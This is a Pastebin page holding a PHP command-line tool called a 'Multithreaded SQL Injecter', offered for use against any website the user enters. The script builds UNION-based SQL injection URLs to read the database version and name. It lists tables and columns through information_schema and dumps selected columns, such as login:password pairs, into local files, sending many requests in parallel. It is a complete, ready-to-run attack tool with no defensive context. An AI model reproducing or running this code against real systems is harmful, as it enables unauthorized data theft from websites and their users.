API tools faq
paste
Advertisement
i-Hmx

Untitled

i-Hmx
Aug 31st, 2012
162
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.04 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. set_time_limit(0);
  3. /*******************************************************************************************************************************
  4. *                                                           __    __                                    ____
  5. *       __    __       __     __    __   ___      _____    |  |  |  |    _    _        ___    __       / ___\
  6. *      /  \  /  \     |__|    \ \  / /  / _ \    /   __\   |__|__|__|   | |  | |      |   \  |  |     / /
  7. *     /    \/    \    |  |     \ \/ /  / /_\ \  /   /___   |__|__|__|   | |  | |      |    \ |  |    | |  __
  8. *    /  /\    /\  \   |  |      /  /  / /___\ \ |      /   |  |  |  |   | |__| |      |  |\ \|  |    | |_/ /
  9. *   /__/  \__/  \__\  |__|     /__/  /_/     \_\ \____/    |__|  |__|    \______\     |__| \____|    |____/
  10. --------------------------------------------------------------------------------------------------------------------------------
  11. * Multithreaded SQL Injecter
  12. * Coded by Miyachung
  13. * Miyachung@hotmail.com
  14. * Special Thanks burtay
  15. * Janissaries.Org
  16. *******************************************************************************************************************************/
  17.  
  18. if(!is_dir("dumps")){mkdir("dumps");}
  19.  
  20. echo "[+]Enter website: ";
  21. $site                      = fgets(STDIN);
  22. $site                      = str_replace("\r\n","",$site);
  23. $site                      = trim($site);
  24. if(!$site) exit("\n[-]Where is the website!");
  25. if(!preg_match('#http#',$site)) $site = "http://".$site;
  26. echo "[+]Enter column number: ";
  27. $colons                   = fgets(STDIN);
  28. $colons                      = str_replace("\r\n","",$colons);
  29. $colons                      = trim($colons);
  30. if(!$colons) exit("\n[-]Where is the columns!");
  31. echo "[+]Enter effected column: ";
  32. $effected                   = fgets(STDIN);
  33. $effected                  = str_replace("\r\n","",$effected);
  34. $effected                  = trim($effected);
  35. if(!$effected) exit("\n[-]Where is the effected column!");
  36. echo "[+]Advanced SQL Injecter\n";
  37. echo "[+]Coded by Miyachung || Janissaries.Org\n";
  38. $version_url              =    __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<v3rsion>"),__hexEncode("</v3rsion>"),"version()");
  39. $version_page              = fetch($version_url);
  40. if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$version_page))
  41. {
  42. exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  43. }
  44. elseif(preg_match("#403 Forbidden#si",$version_page))
  45. {
  46. exit("[-]Fail -> 403 Forbidden\n");
  47. }
  48. $version_page              = __replace($version_page);
  49.  
  50. if(preg_match('#<v3rsion>#si',$version_page))
  51. {
  52. preg_match("/<v3rsion>(.*?)<\/v3rsion>/si",$version_page,$version);
  53. echo "[+]Version -> ".strip_tags($version[1])."\n";
  54. }
  55. else
  56. {
  57. exit("[-]Version not found\n");
  58. }
  59.  
  60. $database_url              = __make_SQL_URL($site,$colons,$effected,FALSE,TRUE,"",__hexEncode("<d4tabase>"),__hexEncode("</d4tabase>"),"database()");
  61. $database_page              = fetch($database_url);
  62. if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$database_page))
  63. {
  64. exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  65. }
  66. elseif(preg_match("#403 Forbidden#si",$database_page))
  67. {
  68. exit("[-]Fail -> 403 Forbidden\n");
  69. }
  70. $database_page              = __replace($database_page);
  71. if(preg_match('#<d4tabase>#si',$database_page))
  72. {
  73. preg_match("/<d4tabase>(.*?)<\/d4tabase>/si",$database_page,$database);
  74. echo "[+]Database -> ".strip_tags($database[1])."\n";
  75. }
  76. else
  77. {
  78. echo "[-]Database not found\n";
  79. }
  80. if(substr($version[1],0,1) == 5)
  81. {
  82. echo "[+]Version >= 5 getting tables,using information_schema.tables\n";
  83. }else{exit("[-]Version < 5 , sorry can't get the tables");}
  84.  
  85.  
  86. $table_counturl          = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,"",__hexEncode("<t4blecount>"),__hexEncode("</t4blecount>"),"count(table_name)");
  87. $table_countpage      = fetch($table_counturl);
  88. $table_countpage      = __replace($table_countpage);
  89.  
  90. preg_match("/<t4blecount>(.*?)<\/t4blecount>/si",$table_countpage,$table_counted);
  91.  
  92. if($table_counted[1] == null)
  93. {
  94. exit("[-]Tables not found\n");
  95. }
  96. echo "[+]Total tables -> ".$table_counted[1]."\n";
  97.  
  98. for($xz=0;$xz<$table_counted[1];$xz++)
  99. {
  100. $table_url[]              = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.tables+where+table_schema=database()",TRUE,$xz,__hexEncode("<t4bles>"),__hexEncode("</t4bles>"),"table_name");
  101. // $table_page              = fetch($table_url);
  102. // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$table_page))
  103. // {
  104. // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  105. // }
  106. // elseif(preg_match("#403 Forbidden#si",$table_page))
  107. // {
  108. // exit("[-]Fail -> 403 Forbidden\n");
  109. // }
  110. // $table_page              = __replace($table_page);
  111. // preg_match("/<t4bles>(.*?)<\/t4bles>/si",$table_page,$tables);
  112. // $tbls[] = strip_tags(trim($tables[1]));
  113. }
  114. $tbls    =    __threading($table_url,10,"/<t4bles>(.*?)<\/t4bles>/si",FALSE,FALSE);
  115. table_again:
  116. echo "\n";
  117. $tbls    =    array_values(array_unique(array_filter($tbls)));
  118. if(empty($tbls))
  119. {
  120. exit("[-]Can't get tables\n");
  121. }
  122. foreach($tbls as $tid => $tbl)
  123. {
  124. echo "[$tid]$tbl\n";
  125. }
  126. echo "\n[+]Choose a table for get columns,just type number (exit): ";
  127. $choose     = fgets(STDIN);
  128. $choose     = str_replace("\r\n","",$choose);
  129. $choose     = trim($choose);
  130.  
  131. if($choose == "exit")
  132. {
  133. exit("\n");
  134. }
  135. $selected   = $tbls[$choose];
  136.  
  137. $column_counturl    = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,"",__hexEncode("<c0lumnscount>"),__hexEncode("</c0lumnscount>"),"count(column_name)");
  138. $column_countpage    = fetch($column_counturl);
  139. $column_countpage    = __replace($column_countpage);
  140.  
  141. preg_match("/<c0lumnscount>(.*?)<\/c0lumnscount>/si",$column_countpage,$column_counted);
  142.  
  143. if($column_counted[1] == null || $column_counted[1] == 0)
  144. {
  145. echo "[-]Columns not found\n";
  146. goto table_again;
  147. }
  148. echo "[+]Total columns for $selected -> ".$column_counted[1]."\n";
  149.  
  150. for($xc=0;$xc<$column_counted[1];$xc++)
  151. {
  152. $column_url[]         = __make_SQL_URL($site,$colons,$effected,"+from+information_schema.columns+where+table_name=0x".__hexEncode($selected)."",TRUE,$xc,__hexEncode("<c0lumns>"),__hexEncode("</c0lumns>"),"column_name");
  153. // $column_page        = fetch($column_url);
  154. // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$column_page))
  155. // {
  156. // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  157. // }
  158. // elseif(preg_match("#403 Forbidden#si",$column_page))
  159. // {
  160. // exit("[-]Fail -> 403 Forbidden\n");
  161. // }
  162. // $column_page    = __replace($column_page);
  163. // preg_match("/<c0lumns>(.*?)<\/c0lumns>/si",$column_page,$columns);
  164. // $cols[] = strip_tags(trim($columns[1]));
  165. }
  166. $cols = __threading($column_url,5,"/<c0lumns>(.*?)<\/c0lumns>/si",FALSE,FALSE);
  167. col_showagain:
  168. echo "\n";
  169. $cols = array_values(array_unique(array_filter($cols)));
  170.     foreach($cols as $cid => $colname)
  171.     {
  172.         echo "[$cid]$colname\n";
  173.     }
  174.  
  175. what_again:
  176. echo "\n[+]What do you wanna do (dump,back,exit): ";
  177. $whatdo = fgets(STDIN);
  178. $whatdo = str_replace("\r\n","",$whatdo);
  179. $whatdo = trim($whatdo);
  180.  
  181. if($whatdo == "dump")
  182. {
  183. col_ask:
  184. echo "[+]Select dump column 1,just type number(back,exit): ";
  185. $select_col1 = fgets(STDIN);
  186. $select_col1 = str_replace("\r\n","",$select_col1);
  187. $select_col1 = trim($select_col1);
  188. if($select_col1 == "back")
  189. {
  190. goto col_showagain;
  191. }
  192. elseif($select_col1 == "exit")
  193. {
  194. exit("\n");
  195. }
  196.  
  197. echo "[+]Select dump column 2,type number(if you don't want just enter,back,exit): ";
  198. $select_col2 = fgets(STDIN);
  199. $select_col2 = str_replace("\r\n","",$select_col2);
  200. $select_col2 = trim($select_col2);
  201. if($select_col2 == "back")
  202. {
  203. goto col_ask;
  204. }
  205. elseif($select_col2 == "exit")
  206. {
  207. exit("\n");
  208. }
  209. elseif(!empty($select_col2))
  210. {
  211. $column2     = $cols[$select_col2];
  212. }
  213. $column1     = $cols[$select_col1];
  214.  
  215. $count_url  = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,"",__hexEncode("<miyacount>"),__hexEncode("</miyacount>"),"count($column1)");
  216. $count_page = fetch($count_url);
  217. $count_page    = __replace($count_page);
  218. preg_match("/<miyacount>(.*?)<\/miyacount>/si",$count_page,$datacount);
  219. if(trim($datacount[1]) == null || $datacount[1] == 0)
  220. {
  221. echo "[-]Columns empty\n";
  222. goto col_showagain;
  223. }
  224. echo "[+]Total datas -> ".$datacount[1]."\n";
  225. echo "[+]Using LIMIT NULL,1 for dump\n\n";
  226. for($x=0;$x<=$datacount[1];$x++)
  227. {
  228.  
  229. if($column2)
  230. {
  231. $dump_url[]         = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1,0x3a,$column2");
  232. $filename            = "dumps/".__parse($site).",$column1"."_"."$column2.txt";
  233. }
  234. else
  235. {
  236. $dump_url[]         = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE,$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1");
  237. $filename            = "dumps/".__parse($site).",$column1.txt";
  238. }
  239. // $dump_page        = fetch($dump_url);
  240. // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$dump_page))
  241. // {
  242. // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  243. // }
  244. // elseif(preg_match("#403 Forbidden#si",$dump_page))
  245. // {
  246. // exit("[-]Fail -> 403 Forbidden\n");
  247. // }
  248. // $dump_page        = __replace($dump_page);
  249.  
  250. // if(preg_match("/<dumped>(.*?)<\/dumped>/si",$dump_page,$dumps))
  251. // {
  252. // $dump = $dumps[1];
  253. // echo strip_tags(trim("[$x]$dump"))."\n";
  254. // ob_flush();flush();
  255. // __dumpsave($filename,$dump."\r\n");
  256. // }
  257. }
  258. if($datacount[1] >= 20)
  259. {
  260. $dumps    =    __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,TRUE,$filename);
  261. }
  262. else
  263. {
  264. $dumps    =    __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,FALSE,"");
  265. }
  266. unset($column_url);
  267. unset($dump_url);
  268. goto col_showagain;
  269. }
  270. elseif($whatdo == "back")
  271. {
  272. unset($column_url);
  273. unset($cols);
  274. goto table_again;
  275. }
  276. elseif($whatdo == "exit")
  277. {
  278. exit("\n");
  279. }
  280. else
  281. {
  282. echo "[-]Unknown command\n";
  283. goto what_again;
  284. }
  285.  
  286.  
  287.  
  288. function fetch($url)
  289. {
  290. $curl     = curl_init();
  291. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  292. curl_setopt($curl,CURLOPT_URL,$url);
  293. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  294. $oba    = curl_exec($curl);
  295. return $oba;
  296. }
  297. function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2,$what)
  298. {
  299. $colon_union               = range(1,$colons);
  300. if($concat)
  301. {
  302. $colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)";
  303. }
  304. else
  305. {
  306. $colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)";
  307. }
  308. $colon_union               = implode(",",$colon_union);
  309.  
  310. if($from)
  311. {
  312.  
  313. if($limit != null)
  314. {
  315. $url                      = $site."+and+1=0+union+select+".$colon_union.$from."+limit+$limit,1--";
  316. }else
  317. {
  318. $url                      = $site."+and+1=0+union+select+".$colon_union.$from."--";
  319. }
  320.  
  321. }else{
  322.  
  323. if($limit != null)
  324. {
  325. $url                      = $site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--";
  326. }
  327. $url                      = $site."+and+1=0+union+select+".$colon_union."--";
  328. }
  329. return $url;
  330. }
  331. function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL)
  332. {
  333. $init = curl_multi_init();
  334. $urls = array_chunk($urls,$thread);
  335. $x = 0;
  336. foreach($urls as $url)
  337. {
  338.     for($i=0;$i<=count($url)-1;$i++)
  339.     {
  340.     $curl[$i] = curl_init();
  341.     curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
  342.     curl_setopt($curl[$i],CURLOPT_URL,$url[$i]);
  343.     curl_setopt($curl[$i],CURLOPT_TIMEOUT,10);
  344.     curl_multi_add_handle($init,$curl[$i]);
  345.     }
  346.    
  347.     do{curl_multi_exec($init,$active);usleep(11);}while($active>0);
  348.    
  349.     foreach($curl as $cid => $page)
  350.     {
  351.     $content[$cid] = curl_multi_getcontent($page);
  352.     curl_multi_remove_handle($init,$page);
  353.     if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid]))
  354.     {
  355.     exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n");
  356.     }
  357.     elseif(preg_match("#403 Forbidden#si",$content[$cid]))
  358.     {
  359.     exit("[-]Fail -> 403 Forbidden\n");
  360.     }
  361.     preg_match($regex,$content[$cid],$veri);
  362.     if($yaz == TRUE)
  363.     {
  364.        
  365.         if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1]))
  366.         {
  367.         $x++;
  368.         echo "[$x]$veri[1]\n";
  369.         ob_flush();flush();
  370.             if($kaydet == TRUE && $file != NULL)
  371.             {
  372.             $fopen = fopen($file,'ab');
  373.             fwrite($fopen,trim($veri[1])."\r\n");
  374.             fclose($fopen);
  375.             }
  376.         }
  377.     }
  378.     else
  379.     {
  380.     $veriler[] = $veri[1];
  381.     }
  382.    
  383.     }
  384. }
  385. return $veriler;
  386. }
  387. function __hexEncode($string)
  388. {
  389.    $hex='';
  390.     for ($i=0; $i < strlen($string); $i++)
  391.     {
  392.         $hex .= dechex(ord($string[$i]));
  393.     }
  394.     return $hex;
  395. }
  396. function __replace($text)
  397. {
  398. $text              = str_replace("&lt;","<",$text);
  399. $text              = str_replace("&gt;",">",$text);
  400. return $text;
  401. }
  402. function __dumpsave($file,$text)
  403. {
  404. $fp = fopen($file,'ab');
  405. fwrite($fp,$text);
  406. fclose($fp);
  407. return true;
  408. }
  409. function __parse($site)
  410. {
  411. $site = explode("/",$site);
  412. $site = $site[2];
  413. return $site;
  414. }
  415. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!